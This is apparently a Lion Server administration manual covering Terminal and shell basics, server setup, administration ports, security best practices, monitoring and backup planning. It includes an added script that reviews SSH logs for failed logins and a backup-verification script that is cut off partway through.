The primary way to access the CLI in Mac OS X is with the Terminal application. Other ways to access the CLI are discussed in related topics. Each window in Terminal contains an execution context, called a shell, which is separate from all other execution contexts. The shell is an interactive programming language interpreter, with a specialized syntax for executing commands and writing structured programs (shell scripts). Different shells have slightly different capabilities and programming syntax. Although you can use any shell, the examples in this book use bash, the startup shell for Mac OS X and the default user shell.

UNIX

Mac OS X and Mac OS X Server are built on the foundation of the UNIX operating system. UNIX-based operating systems include BSD, GNU/Linux, AIX, and Solaris. The shared heritage of these operating systems means that many programs are compatible across this larger family, with minimal changes. The unique underpinnings of each brand of UNIX are what distinguish them from each other. To support programs and utilities that work across multiple flavors of UNIX, some specifications are set by standards bodies. One such specification is The Open Group's Single UNIX Specification. Mac OS X v10.5 and later conform to v3 of this specification, which implies conformance to the SUSv3 and POSIX 1003.1 specifications for the C API, shell utilities, and threads. Code that complies with the UNIX-03 specification works on Mac OS X Server and on other compliant systems. For more information about the Single UNIX Specification v3, see www.unix.org/version3/.

The shell

In UNIX-based operating systems, the shell is the fundamental user interface. The shell is an environment that presents a text prompt to the user and accepts keyboard input from the user. In Mac OS X, the shell is easily accessed through Terminal, but there are other options. The shell can be invoked interactively, or by a text file with commands to the shell given in a standard format. There are several shells available in Mac OS X, each with its own strengths and capabilities. Shells in Mac OS X include bash, csh, ksh, sh, tcsh, and zsh. For information about these shells, see their man pages.
RELATED INFORMATION

Use the command line to access remote computers

Lion server fundamentals

Using the Command Line

Introducing the command line

Access the shell with the Terminal app

To open Terminal, click the Terminal icon in the Dock or in the Utilities folder in Launchpad. Each window in Terminal represents another instance of a shell process. Terminal presents a prompt when it's ready to accept a command. The prompt you see depends on your Terminal and shell preferences, but it often includes the name of the host you're logged in to, your current working folder, your user name, and a prompt symbol. For example, if a user named mariah is using the default bash shell, the prompt appears as:

server1:~ mariah$

This indicates that she is logged in to a computer named server1 as the user named mariah, and her current folder is her home folder, indicated by the tilde (~).


Close the shell


To quit a shell session, enter the command exit. This ensures that commands the shell is actively running are closed. If anything's still in progress, the shell warns you.


Execute commands and run tools


To execute a command in the shell, enter the complete pathname of the tool's executable file, followed by arguments, and then press Return. If a command is located in one of the shell's known folders, you can omit path information and enter the command name. The list of known folders is stored in the shell's PATH environment variable and includes the folders containing most command-line tools. For example, to run the ls command in the current user's home folder, enter the following at the command line and press Return:

host:~ mariah$ ls

The shell looks through the list of folders in the PATH variable until it finds a program named ls; in this case, it finds ls in /bin, and runs /bin/ls. To run a command in the current user's home folder, precede it with the folder specifier. For example, to run MyCommandLineProg, use the following:

host:~ mariah$ ~/MyCommandLineProg

To open an application, use the open command:

open -a MyProg.app

When entering commands, if you get the message "command not found", check your spelling. Here's an example:

server:/ mariah$ opne -a TextEdit.app
-bash: opne: command not found

If this error recurs, the command you're trying to run might not be in your default search path. Add the path before the command name:

server:/ mariah$ sudo /System/Library/ServerSetup/serversetup -getHostname
server.example.com

or change your working folder to the folder that contains the tool:

server:/ mariah$ cd /System/Library/ServerSetup
server:/System/Library/ServerSetup mariah$ sudo ./serversetup -getHostname
server.example.com

or define the path for this session and then run the command:

server:/ mariah$ PATH=$PATH:/System/Library/ServerSetup
server:/ mariah$ sudo serversetup -getHostname
server.example.com


Terminate commands
To terminate the current command, press Control-C. This keyboard shortcut sends an abort signal to the command. In most cases this causes the command to terminate, although commands can install signal handlers to trap this signal and respond differently.


Specify files and folders


Most commands operate on files and folders, whose locations are identified by paths. The folder names that make up a path are separated by slashes. For example, the path to the Terminal application is /Applications/Utilities/Terminal.app. Standard shortcuts used to represent specific folders are shown in the following table. They are specified relative to the current folder, and can eliminate the need to enter full paths.

Shortcut      Description
.             A single period represents the current folder. For example, the string ./Test.c represents the Test.c file in the current folder.
..            Two periods represent the parent folder of the current folder. For example, the string ../Test represents a sibling folder (named Test) of the current folder.
~[username]   The tilde character represents the home folder of the logged-in user. For example, to specify the Documents folder of the current user, you would specify ~/Documents. To specify another user's Documents folder, use their short name preceded by the tilde (~) character, for example ~jsmith/Documents. In Mac OS X, this folder is in the local /Users folder or on a network server. For a list of short names on your system, enter dscl . -list /Users. Most of these users aren't traditional user accounts with home directories, but you should be able to find the short name of known users on the computer.

File and folder names can include letters, numbers, a period, or the underscore character. Avoid most other characters, including space characters. Although some Mac OS X file systems permit the use of these other characters, including spaces, you might need to add single or double quotation marks around pathnames that contain them. For individual characters, you can also escape the character, that is, put a backslash character immediately before the character in your string. For example, the pathname My Disk is entered as "My Disk" or My\ Disk.


Commands requiring root or administrator privileges


Many commands used to manage a server must be executed by an administrator user or the root user. For example, entering

server:~ mariah$ shutdown

gives you the following error:

shutdown: NOT super-user

This is because the shutdown command can be run only by the root user or by an administrative user with special privileges. To run commands in this superuser mode, use the sudo command. sudo stands for "superuser do". The following example works, so don't run it unless you want to restart your computer:

server:~ mariah$ sudo shutdown

You'll be prompted for the password of the current user. Only users designated as admin users can execute commands with sudo. If you're logged in as a user who isn't an admin user, you can substitute users by entering su adminUsername, where adminUsername is the name of a user in the Admin group. After you enter that user's password, a new shell is launched from the existing shell, as that user. If a command requires it, you can use su to log in as the root user. Under normal circumstances you don't need to use the root user account. If you su to the root user, be especially careful, because you have sufficient privileges to make changes that can cause your server to stop working.

For more information about the sudo and su commands, see their man pages.


Get help for command-line tools


Most command-line documentation comes in the form of man (short for manual) pages. Man pages provide reference information for shell commands, tools, and high-level concepts. To access a man page entry, enter

$ man command

Replace command with the name of the command you want to find information about. The man page contains details about the command, its options and parameters, and proper use. For help using the man command itself, enter

$ man man

You can press the Space bar to go to the next page, the B key to go back a page, or the Return key to scroll forward one line at a time. Press the Q key to exit the man page. You can search the contents of a man page by pressing the "/" key followed by the word you're looking for. If multiple instances are found, use the P and N keys to access the previous and next instances of the term. If you don't know the name of a man page, you can search the topics by entering

$ man -k topic

Replace topic with a word that would be contained in the description of the man page you might be looking for. For example:

$ man -k "directory service"

returns references to the dscacheutil, dscl, and whois man pages. You can also find links to related man pages at the bottom of a man page in the See Also section. If Xcode tools are installed, you can view man pages in Xcode by choosing Open man page... from the Help menu. There are also several third-party graphical Mac OS X applications available for viewing man pages. You can find one by choosing Mac OS X Software from the Apple menu and then searching for "man page".


Use the command line to access remote computers


You can run command-line tools on remote computers. There are three methods for connecting to the command-line environment of a remote computer:

- SSH
- Apple Remote Desktop (ARD)
- X11

RELATED INFORMATION

SSH (Secure Shell)
Apple Remote Desktop
X11

Lion server fundamentals

Installation and setup

Installation

Make your Mac a server


If your Mac isn't a server, you can make it one by installing Lion Server. Before following the steps below to make your Mac a server:

- Make sure your Mac has Mac OS X Lion installed. If your Mac has Mac OS X Snow Leopard, you can upgrade it to Lion. For information, see www.apple.com.
- Check Lion Server requirements
- Check your DHCP server's configuration
- Register an Internet host name
- Consider disk preparation options

1. On the Mac you want to make a server, open the Mac App Store, and get Mac OS X Lion Server. The Server app is installed and opens automatically.
2. Click Configure in the Welcome to Server window, and then follow the onscreen instructions to begin installing and setting up Lion Server software. After you enter the name and password of an administrator account on your Mac, the Server app downloads additional Lion Server software, installs it, and configures your Mac as a server.

RELATED TOPIC

After setting up Lion Server


Types of installation
There are three ways to install Lion Server.

Install Server components on Lion

This method works after Lion is installed over a client version of Snow Leopard. If you need Lion Server-compatible versions of the advanced administration tools, you can download them from AppleCare support.

Install Lion Server over Snow Leopard Server

If you have an existing Snow Leopard Server installation, you can purchase and install Lion from the Mac App Store. The Mac App Store allows you to install both Lion and the Server components as a single unit. After Lion Server is installed over Snow Leopard Server, the Snow Leopard Server advanced administration tools (Server Admin, Workgroup Manager, and others) are deleted. If you need Lion Server-compatible versions of advanced administration tools, download them from AppleCare support.

Clean installation

This method begins with starting a Lion Server installation. Instead of choosing a disk partition with an existing operating system on it, you install Lion Server on a blank disk partition. You get a clean install of Lion Server and you can configure the server from scratch.

Lion server fundamentals

Installation and setup

Setup

Set up a server remotely


If you have a new server or a computer with Lion Server newly installed, you can set it up over the network by using the Server app on an administrator computer. The server you're setting up doesn't need a display.

1. Prepare your DHCP server for the new server, and if you have a DNS server, prepare it also. If you have an Internet router, it's probably your DHCP server. Your DNS server may be administered by your Internet service provider or a DNS hosting service, or it may be another server on your intranet. For more information, see DHCP server configuration for your server and Register the server's Internet host name.
2. Make sure the new server has an active connection to the same network as the administrator computer you're using.
3. If the server is off, turn it on. When the server starts up, the server setup assistant opens and waits for setup to begin.
4. On your administrator computer, open the Server app, choose Manage > Connect to Server, select the new server in the Choose a Mac dialog, and click Continue. The new server may be listed with a name generated from the computer model and the Ethernet hardware address (the MAC address), or with a name from your DNS server. If the server you want to set up is listed in the Server app sidebar, you can begin setup by selecting it and clicking Set Up This Mac.
5. Enter the new server's complete hardware serial number. You can find the serial number on the case of the product, on the original product packaging, and on the original product receipt or invoice. For more information about finding the serial number, see the Apple Support article at support.apple.com/kb/HT1349. Match the capitalization of the serial number when you type it.
6. Click Continue, and proceed through the server setup assistant panes.

After server setup is complete, you can take additional steps to enhance the security, accessibility, and overall usefulness of your new server. For information, see After setting up Lion Server.
RELATED TOPIC

Prepare an adminis trator computer


About AutoServerSetup.plist
Automatic server setup is not supported in Lion Server.

WARNING: Your existing AutoServerSetup.plist may continue to function normally, or it may cause unintentional configuration. If you perform a clean installation, Server Assistant finds and tries to apply the settings in the plist file.

If you perform a clean installation and run the Server Assistant locally, a file at /System/Library/ServerSetup/AutoServerSetup.plist contains the setup data for the server. This file can be reused only with other clean installations of Lion Server.

WARNING: This method of server configuration is not supported, and may not function as intended.


Ports used for administration


For Apple's administration applications to function, specific ports must be enabled. In addition, other ports must be enabled for each service you want to run on your server.

Port number and type    Tool used
22 TCP                  SSH command-line shell
311 TCP                 Server Admin (with SSL)
625 TCP                 Workgroup Manager
389, 686 TCP            Directory
4111 TCP                Xgrid Admin


Ports open by default


After manual setup, the firewall is off by default, and therefore all ports are open. When the firewall is on, all ports are blocked except the following for all originating IP addresses:

Port number and type          Service
22 TCP                        SSH command-line shell
311 TCP                       Server Admin (with SSL)
626 UDP                       Serial number support
625 TCP                       Remote Directory Access
ICMP incoming and outgoing    Standard ping
53 UDP                        Host name resolution


After setting up Lion Server


After completing initial setup of Lion Server, you can take steps to enhance the security, accessibility, and usefulness of your new server.

- Enhance the security, accessibility, and usefulness of your new server by following the advice in the Next Steps section of the Server app.
- Install available updates to Lion Server by using Software Update.
- So users can authenticate for services, do either or both of the following: create user accounts on your server; connect to a network account server (also called a directory server) in your organization to let people use their existing accounts.
- Turn on and customize services you want to provide, view server information and change it as needed, and track server alerts.
- Allow access to services over the Internet by doing either or both of the following: to make specific services publicly available on the Internet, configure port mapping on your AirPort device or other router; to let users securely access all services via the Internet without making services publicly available, use VPN service.
- Protect the information on your Mac by using a strong administrator password, securing the server when it's idle, reducing the use of administrator accounts, and logging out when you finish using an administrator account. For instructions, search Mac Help for "Protect the information on your Mac".

Lion server fundamentals

Planning and best practices

Planning server usage


Installation planning is especially important if you're integrating Lion Server into an existing network or preparing to set up multiple servers. But even single-server environments can benefit from a brief assessment of the needs you want a server to address. The major goals of the planning phase are to make sure that:

- Server user and administrator needs are addressed by the servers you deploy
- Server and service prerequisites that affect installation and initial setup are identified

Use these topics to stimulate your thinking. They don't present a rigorous planning guide, nor do they provide the details you need to determine whether to implement a service and assess its resource requirements. Instead, view these topics as an opportunity to think about how to maximize the benefits of Lion Server in your environment. Planning, like design, isn't a linear process. The topics don't require you to follow a mandatory sequence. Different topics present suggestions that could be implemented simultaneously or iteratively.

RELATED TOPICS

Setting up a planning team
Identifying servers to set up
Understanding physical infrastructure requirements
Determining services to host on each server
Ensuring proper operational conditions
Minimize the need to relocate servers after setup
About load balancing


Eliminating single points of failure


To improve the availability of your server, reduce or eliminate single points of failure. A single point of failure is any component in your server environment that, if it fails, causes your server to fail. Some single points of failure include:

- Computer system
- Hard disk
- Power supply

Although it is almost impossible to eliminate all single points of failure, minimize them as much as possible. For example, using a backup computer and a file storage pool for Lion Server eliminates the computer as a single point of failure. Although master and backup computers can fail at once or one after the other, the possibility of such an event happening is negligible. Another way to prevent a computer from failing is to use a backup power source and take advantage of hardware RAID to mirror the hard disk. With hardware RAID, if the main disk fails, the system can still access the same data on the mirror drive, as is the case with Xserve.


Minimize the need to relocate servers after setup


Before setting up a server, try to place it in its final network location (IP subnet). If you're concerned about preventing unauthorized or premature access during setup, set up a firewall to protect the server while finalizing its configuration. If you can't avoid moving a server after initial setup, you must change settings that are sensitive to network location before you can use the server. For example, the server's IP address and host name, stored in directories and configuration files on the server, must be updated.

- Minimize the time the server is in its temporary location so the amount of information to change is limited.
- Postpone configuring services that depend on network settings until the server is in its final location. Such services include Open Directory replication, Apache settings (such as virtual domains), DHCP, and other network infrastructure settings that other computers depend on.
- Wait to import final user accounts. Limit accounts to test accounts so you minimize the user-specific network information (such as home folder location) that you must change after the move.
- After you move the server, you can change its IP address in the Network pane of System Preferences (or use the networksetup tool). You will probably need to manually adjust service and system settings. For more information on how to do this, see Understanding changes to the server IP address or network identity.
- Reconfigure the search policy of computers (such as user computers and DHCP servers) that are configured to use the server in its original location.


About load balancing


One factor that can cause services to become unavailable is server overload. A server has limited resources and can service a limited number of requests simultaneously. If the server gets overloaded, it slows down and can eventually crash. One way to overcome this problem is to distribute the load among a group of servers (a server farm) using a third-party load-balancing device. Clients send requests to the device, which then forwards the request to the first available server based on a predefined algorithm. The clients see only a single virtual address, that of the load-balancing device. Many load-balancing devices also function as switches, providing two functions in one, which reduces the amount of hardware you need to use.

Note: A load-balancing device must be able to handle the aggregate (combined) traffic of the servers connected to it. Otherwise, the device becomes a bottleneck, which reduces the availability of your servers. Not all services are conducive to load balancing, even with a third-party product; for those that are, you may need shared storage for load balancing to be effective.

Load balancing provides several advantages:

- High availability: Distributing the load among multiple servers reduces the chance that a server will fail due to overload.
- Fault tolerance: If a server fails, traffic is transparently redirected to other servers. There might be a brief disruption of service if, for example, a server fails while a user is downloading a file from shared storage, but the user can reconnect and restart the file download.
- Scalability: If demand for your services increases, you can transparently add more servers to your farm to keep up with demand.
- Better performance: By sending requests to the least-busy servers, you can respond faster to user requests.

Security best practices


Server administrators must make sure that adequate security measures are implemented to protect a server from attacks. A compromised server risks the resources and data on the server and risks the resources and data on other connected systems. The compromised system can then be used as a base to launch attacks on other systems inside or outside your network.

Security best practices

Securing servers requires weighing the cost of implementing security against the likelihood of a successful attack and the impact of that attack. It is not possible to eliminate all security risks, but it is possible to minimize risks to efficiently deal with them. Best practices for server system administration include the following:

- Update your systems with critical security patches and updates. Check for updates regularly.
- Install antivirus tools, use them regularly, and update virus definition files and software regularly. Although viruses are less prevalent on the Mac platform than on Windows, viruses still pose a risk.
- Restrict physical access to the server. Because local access generally allows an intruder to bypass most system security, secure the server room, server racks, and network junctures. Use security locks. Locking your systems is a prudent thing to do. Make sure there is adequate protection from physical damage to servers and ensure that the climate control functions in the server room.
- Take additional precautions to secure servers. For example, enable firmware passwords, encrypt passwords where possible, and secure backup media.
- Secure logical access to the server. For example, remove or disable unnecessary accounts. Accounts for outside parties should be disabled when not in use.
- Configure SACLs as needed. Use SACLs to specify who can access services.
- Configure ACLs as needed. Use ACLs to control who can access share points and their contents.
- Protect any account with root or system administrator privileges by following recommended password practices using strong passwords.
- Do not use administrator (UNIX admin group) accounts for daily use. Restrict the use of administration privileges by keeping the admin login and password separate from daily use.
- Back up critical data on the system regularly, with a copy stored at a secure off-site location. Backup media is of little use in recovery if it is destroyed with the computer during a fire. Test your backup and recovery contingency plans to ensure that recovery actually works.
- Review system audit logs regularly and investigate unusual traffic.
- Disable services that are not required on your system. A vulnerability that occurs in any service on your system can compromise the entire system. In some cases, the default configuration (out of the box) of a system leads to exploitable vulnerabilities in services that were enabled implicitly. Turning on a service opens up a port that users can access your system from. Although enabling Firewall service helps avoid unauthorized access, an inactive service port remains a vulnerability that an attacker might exploit.
- Enable firewall service on servers, especially at the network frontier and DMZ. Your server's firewall is the first line of defense against unauthorized access. Consider also a third-party hardware firewall as an additional line of defense if your server is highly prone to attack. If needed, install a local firewall on critical or sensitive servers. Implementing a local firewall protects the system from an attack that might originate in the organization's network or from the Internet. For additional protection, implement a local Virtual Private Network (VPN) that provides a secure encrypted tunnel for communication between a client computer and your server application. Some network devices provide a combination of functions: firewall, intrusion detection, and VPN.
- Administer servers remotely. Manage your servers remotely using applications like Server app, Server Admin, Server Monitor, RAID Admin, and Apple Remote Desktop. Minimizing physical access to the systems reduces the possibility of mischief.
- Use secure passwords. Many applications and services require that you create passwords to authenticate. Mac OS X includes applications that help create complex passwords (using Password Assistant) and securely store your passwords (using Keychain Access).
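The list above asks you to review system audit logs regularly and investigate unusual traffic. The script below is an added example written for this page, not part of the Lion Server manual or of Apple's tooling: it counts failed SSH logins per source address in a secure.log-style input and reports the sources that reach a threshold. The log lines are constructed samples in the format sshd writes, the addresses come from the RFC 5737 documentation ranges, and the threshold of three failures is an assumption to tune for your environment.

```sh
#!/bin/sh
# Added example, not from the Lion Server manual: a small audit-log review that
# counts failed SSH logins per source address and reports sources that reach a
# threshold. Sample log lines below are constructed (not captured from a real
# server) in the format sshd writes to secure.log; addresses are RFC 5737
# documentation ranges.
set -eu

# Constructed sample of secure.log entries.
sample_log() {
    cat <<'EOF'
Oct 12 10:15:01 server sshd[1234]: Failed password for invalid user admin from 203.0.113.5 port 52100 ssh2
Oct 12 10:15:03 server sshd[1234]: Failed password for invalid user admin from 203.0.113.5 port 52101 ssh2
Oct 12 10:15:05 server sshd[1235]: Failed password for root from 203.0.113.5 port 52102 ssh2
Oct 12 10:15:08 server sshd[1236]: Failed password for alice from 203.0.113.5 port 52103 ssh2
Oct 12 10:16:12 server sshd[1240]: Failed password for alice from 198.51.100.7 port 60010 ssh2
Oct 12 10:16:20 server sshd[1240]: Accepted password for alice from 198.51.100.7 port 60010 ssh2
Oct 12 10:17:00 server kernel[0]: disk0s2: I/O timeout
EOF
}

# Print "<address> <failures>" for every source with at least $1 failed SSH
# logins in the log read from standard input, sorted by address. Successful
# logins and unrelated lines are ignored.
failed_login_sources() {   # failed_login_sources <threshold>
    awk -v min="$1" '
        /sshd\[[0-9]+\]: Failed password for/ {
            # the token after "from" is the client address
            for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i + 1)]++; break }
        }
        END { for (ip in fails) if (fails[ip] >= min) print ip, fails[ip] }
    ' | sort
}

# Review with a threshold of 3 failures; the sample trips it for 203.0.113.5 only.
sample_log | failed_login_sources 3
```

On a server you would feed the real log file instead of sample_log and choose a threshold that sits above the normal rate of mistyped passwords; a source that trips it is a lead to investigate and perhaps block at the firewall, not by itself proof of compromise.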

Server monitoring

Monitoring server availability


Detecting potential problems allows you to take steps to resolve them before they impact the availability of your servers. In addition, getting early warning when a problem occurs allows you to take corrective action quickly and minimize disruption to your services.

About monitoring tools
- Track server alerts
- Monitor server stats
- Monitor server status overviews using Server Admin
- About Server Monitor
- About RAID Admin for server monitoring
- About Console for server monitoring
- Using disk monitoring tools
- Using network monitoring tools
- Use server status notification in Server Admin

Other monitoring help topics
- Using remote kernel core dumps
- About Simple Network Management Protocol (SNMP)
- About Logging
- About notification and event monitoring daemons
- View running daemons

Planning a monitoring policy

Gathering data about your systems is a basic function of good administration. Different types of data-gathering are used for different purposes:

Historical data collection
Historical data is gathered for analysis. This could be used for IT planning, budgeting, and getting a baseline for normal server conditions and operations.
- What kinds of data do you need for these purposes?
- How long does it need to be kept?
- How often does it need to be updated?
- How far in the past does it need to be collected?

Real-time monitoring
Real-time monitoring is for alerts and detecting problems as they happen.
- What are you monitoring? How often?
- Does that data tell you what you need to know?
- Are some of these real-time collections for historical purposes?

Debugging
Recurring problems can be analyzed and fixed if properly tracked. Even if you don't control source code, good debugging logs and data can increase the ability of the developer to address your issues.
- How can you capture what is going wrong? How often?
- Does that data tell you what you need to know?
- Are they problems you can fix on your end, or do you need vendor support?

Planning monitoring response

The response to your monitoring is as important as the data collection. In the same way a backup policy is pointless without a restore strategy, a monitoring policy makes little sense without a response policy. Several factors can be considered for a monitoring response:
- What are relevant response methods? In other words, how will the response take place?
- What is the time to response? What is an acceptable interval between failure and response?
- What are the scaling considerations? Can the response plan work with all expected (and even unexpected) frequencies of failure?
- Is testing of the monitoring systems in place? How do you know the monitoring policy is catching the data you need, and how do you know the responses are timely and appropriate? Have you tested the monitoring system recently?

Monitor servers

Check server status


The Server app shows the overall status of each service.

In the Server sidebar, look for a green status indicator next to each service icon. A service with a status indicator is turned on and operating normally. A service without an indicator is turned off.

RELATED TOPIC

Start or stop a service

View server information


You can see general information about your server by using the Server app. The server's Overview pane displays the Mac model name, processor, serial number, storage capacity, memory size, startup disk, system version, and amount of time since the last system restart.

1. In the Server app sidebar, select the server by name, and then click Overview.
2. To see more information about the startup disk and any other disks connected to the server, click the arrow next to the startup disk name. You'll see the Storage pane, which highlights the startup disk in the list of available disks.

RELATED TOPIC

Manage server storage

Monitor server stats


Use the Stats pane of the Server app to get a picture of server activity over time. You can find out when the server is likely to be busy, whether it's operating near capacity, and when it's likely to be least used.

Choose a type of activity and a time period from the pop-up menus.
- Processor Usage: Monitor the workload of the server's processor or processors.
- Memory Usage: See how much memory the server has been using.
- Network Traffic: Track how much incoming and outgoing data the server transfers over the network.

You can also monitor server activity by using the Server Status widget on the server or on another computer. For information, see Use the Server Status widget.

If the server has a display, you can use Activity Monitor (in the Utilities folder in Launchpad) on the server. Activity Monitor shows the processes and applications currently open on the computer. You can use Activity Monitor to monitor short-term processor workload, disk activity, and network activity. For information, see Activity Monitor Help.

Track server alerts


You can use the Server app to view messages about important events that have occurred on the server. Each alert message notes when the event occurred, briefly describes the event, outlines available recovery options for resulting problems, and may assist you in recovery. Lion Server sends alerts about low disk space, software updates, expiring SSL certificates, email viruses, and network configuration changes.

View alerts and resolve resulting problems

1. To view a list of alerts, select Alerts in the Server sidebar. Alerts you haven't viewed are displayed in bold.
2. To view the description and recovery options for an alert, select the alert in the list, and then choose View Alert from the Action pop-up menu. You can also view an alert by double-clicking it in the list.
3. To recover from a problem associated with the alert, use the controls or follow the instructions under the Recovery Options heading.

Clear all alerts

Select Alerts in the Server sidebar, and then choose Clear All from the Action pop-up menu.

Change the email address for server alerts


You can use the Server app to change the email addresses Lion Server sends alerts to. Lion Server sends alerts about low disk space, software updates, expiring SSL certificates, email suspected of having a virus, and network configuration changes.

1. Select Alerts in the Server sidebar.
2. Choose Configure Email Addresses from the Action pop-up menu.
3. Enter the email address you want alerts sent to, or enter multiple email addresses separated by commas.

Use the Server Status widget


You can use the Server Status widget to monitor the status of Lion Server, either on the server itself or from another computer with Mac OS X Lion.

1. Open Dashboard, and look for the Server Status widget. You can open Dashboard by clicking its icon in Launchpad or pressing its keyboard shortcut, which is usually the F12 key. If you don't see the Server Status widget in Dashboard, click Dashboard's Open button (+), and then click or drag the Server Status widget from the widget bar. You can use multiple Server Status widgets to see more than one aspect of a server's status at once or to monitor other servers on the network. For more information, search Mac Help for Dashboard and widgets.
2. If you see the Server, User Name, and Password fields, enter the server's DNS name or IP address followed by an administrator name and password, and then click Done.
3. When the Server Status widget is connected to a server, it displays a graph and other status information about the server and its services. You can:
   - Monitor processor usage, network load, or disk usage by clicking an icon below the graph.
   - Change the processor or network graph's time period to one hour, day, or week by clicking the graph.
   - If your server has more than one disk, view the status of each disk in turn by clicking the disk usage graph.
   - Check the status indicator and activity statistics for the listed services. A green indicator means the service is running.
   - Connect to a different server by moving the mouse to the upper-left corner of the widget and clicking the Info button (i).

RELATED TOPICS

Check server status
Monitor server stats

Backing up the server

Backup policy
All storage systems can fail eventually. Either through equipment wear and tear, accident, or disaster, your data and configuration settings are vulnerable to loss. You should have a backup plan in place to prevent or minimize your data loss. For an expanded introduction, see About backup and restore policies.

Backup strategies

There are many types of backup files, and within each type are many formats and methods. Each backup type serves a unique purpose and has its own considerations. These backup types are not mutually exclusive. They exemplify different approaches to copying data for backup purposes. For example, Time Machine uses a full file-level copy as a base backup; then it uses incremental backups to create snapshots of a computer's data on a given day.

Full images
Full images are byte-level copies of data. They capture the state of the hard disk down to the most basic storage unit. These backups also keep copies of the disk filesystem and the unused or erased portion of the disk in question. They can be used for forensic study of the source disk medium. Such detail often makes file restoration unwieldy. Full image backups are often compressed and are only decompressed to restore the entire file set.

Full file-level copies
Full file-level copies are backups that are kept as duplicates. They do not capture the finest detail of unused portions of the source disk, but they do provide a full record of the files as they existed at the time of backup. If a file changes, the next full file-level backup copies the entire data set in addition to the file that changed.

Incremental backups
Incremental backups start with file-level copies, but they only copy files changed since the last backup. This saves storage space and captures changes as they happen.

Snapshots
Snapshots are copies of data as it was in the past. You can make snapshots from collections of files, or more often from links to other files in a backup file set. Snapshots are useful for making backups of volatile data (data that changes quickly), like databases in use or mail servers sending and receiving mail.

Backup media
Several factors help you determine what type of backup media to choose.

Cost
Use cost per GB to determine what media to choose. For example, if your storage needs are limited, you can justify higher cost per GB, but if you need a large amount of storage, cost becomes a big factor in your decision. One of the most cost-effective storage solutions is a hard disk RAID. It provides a low cost per GB, and it doesn't require the special handling needed by other cost-effective storage types, such as tape drives.

Capacity
If you back up only a small amount of data, low-capacity storage media can do the job. But to back up large amounts of data, use high-capacity devices, such as a RAID.

Speed
When your goal is to keep your server available most of the time, restoration speed becomes a big factor in deciding which media to choose. Tape backup systems can be very cost effective, but they are much slower than RAID.

Reliability
Successful restoration is the goal of a good backup strategy. If you can't restore lost data, the effort and cost you spent in backing up data is wasted and the availability of your services is compromised. Therefore, it's important that you choose highly reliable media to prevent data loss. For example, tapes are more reliable than hard disks because they don't contain moving parts.

Archive life
You never know when you'll need your backed up data. Therefore, choose media that is designed to last for a long time. Dust, humidity, and other factors can damage storage media and result in data loss.

Backup scheduling
Backing up files requires time and resources. Before deciding on a backup plan, consider the following questions:
- How much data will be backed up?
- How much time will the backup take?
- When does the backup need to happen? What else is the computer doing during that time?
- What sort of resource allocation is necessary? For example, how much network bandwidth is necessary to accommodate the load? How much space on backup drives, or how many backup tapes, are required? What sort of drain on computing resources will occur during backup?
- What personnel are necessary for the backup?

Different kinds of backup require different answers to these questions. For example, an incremental file copy might take less time and copy less data than a full file copy (because only a fraction of any given data set will have changed since the last backup). Therefore an incremental backup might be scheduled during a normal use period because the impact to users and systems may be very low. However, a full image backup might have a very strong impact on users and systems if done during the normal use period.

Command-line backup and restoration tools


Lion Server provides several command-line tools for data backup and restoration. For more information about these commands, see their respective man pages.

rsync
Use to keep a backup copy of your data in sync with the original. The tool rsync only copies the files that have changed. By default rsync does not preserve extended attributes in files necessary for many Lion Server services.

ditto
Use to perform full backups.

tar
Use to perform full backups.

asr
Use to back up and restore a volume in block copy mode. If the tool is in file copy mode, it does not preserve all necessary extended attributes in files.

pg_dumpall and psql
Use pg_dumpall to generate a text file of SQL commands that can recreate all databases as they were when the file was saved. Use psql to restore the PostgreSQL databases by executing the SQL commands in the text file output by pg_dumpall.

WARNING: The pg_dumpall and psql tools perform a unified backup and restore of all services that use PostgreSQL databases. These tools back up and restore Address Book, iCal, Podcast, Profile Manager, and Wiki services together. If you use psql to restore the database for one of these services, it also restores the databases for the other services, and you lose changes made since backing up the databases of all these services. For information about backing up and restoring PostgreSQL databases, see Chapter 24 of the PostgreSQL 9.0.4 Documentation at www.postgresql.org/docs/9.0/interactive/backup.html.

Backup verification
You should have a strategy for regularly conducting test restorations. Some third-party software providers support this functionality. However, if you're using your own backup solution, develop the necessary test procedures.

Backup rotation scheme


A backup rotation scheme determines the most efficient way to back up data over a specific period of time. An example of a rotation scheme is the grandfather-father-son rotation scheme. In this scheme, you perform incremental daily backups (son), and full weekly (father) and monthly (grandfather) backups. In the grandfather-father-son rotation scheme, the number of media sets you use for backup determines how much backup history you have. For example, if you use eight backup sets for daily backups, you have eight days of daily backup history because you'll recycle media sets every eight days.

Other backup policy considerations


Consider the following additional items for your backup policy.
- Should file compression be used? If so, what kind?
- Are there onsite and offsite backups and archives?
- Are there special needs for the type of data being stored? For example, for Mac OS X files, can the backup utility preserve file metadata, resource forks, and Access Control List (ACL) privileges?
- Is there sensitive data, such as passwords, social security numbers, phone numbers, medical records, or other legally protected information, that requires special treatment, and that must not be backed up without understanding where the data will flow and be stored?

Data restoration
No backup policy or solution is complete without having accompanying plans for data restoration. Depending on what is being restored, you may have different practices and procedures. For example, your organization may have specific tolerances for how long critical systems can be out of use while the data is restored. Consider the following questions:
- How long will it take to restore data at each level of granularity? For example, how long will a deleted file or email take to restore? How long will a full hard disk image take to restore? How long would it take to return the whole network to its state three days ago?
- What process is most effective for each type of restore? For example, why would you roll back the entire server for a single lost file?
- How much administrator action is necessary for each type of restore? How much automation must be developed to best use administrators' time?
- Under what circumstances are restores initiated? Who and what can start a restore and for what reasons?

Restore practices and procedures must be tested regularly. A backup data set that does not restore correctly cannot be considered a trustworthy backup. Backup integrity is measured by restore fidelity.
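The backup types described under Backup strategies (a full file-level copy followed by incrementals), the Backup verification advice to conduct test restorations, and the rule just stated that backup integrity is measured by restore fidelity can be exercised end to end with a few POSIX tools. The script below is an added example written for this page, not part of the Lion Server manual or of any Apple tool: it takes a full tar copy of a constructed sample tree, detects changed and new files by comparing a cksum manifest against the one recorded at the full backup (an assumption standing in for the change tracking of tools such as rsync or Time Machine), writes an incremental archive, restores both into a scratch directory, and verifies the result by comparing manifests. All paths, function names, and sample files are constructed for the example.

```sh
#!/bin/sh
# Added example, not from the Lion Server manual: a minimal full + incremental
# file-level backup with a checksum-verified test restore, using only POSIX
# tools (tar, find, cksum, grep, cmp). Change detection is by checksum against
# the manifest written at the last full backup (a simplification). Sample
# directory layout and files are constructed.
set -eu

# Manifest of "<cksum> <size> <relative path>" for every regular file under $1,
# in path order so two manifests can be compared with cmp.
manifest() {
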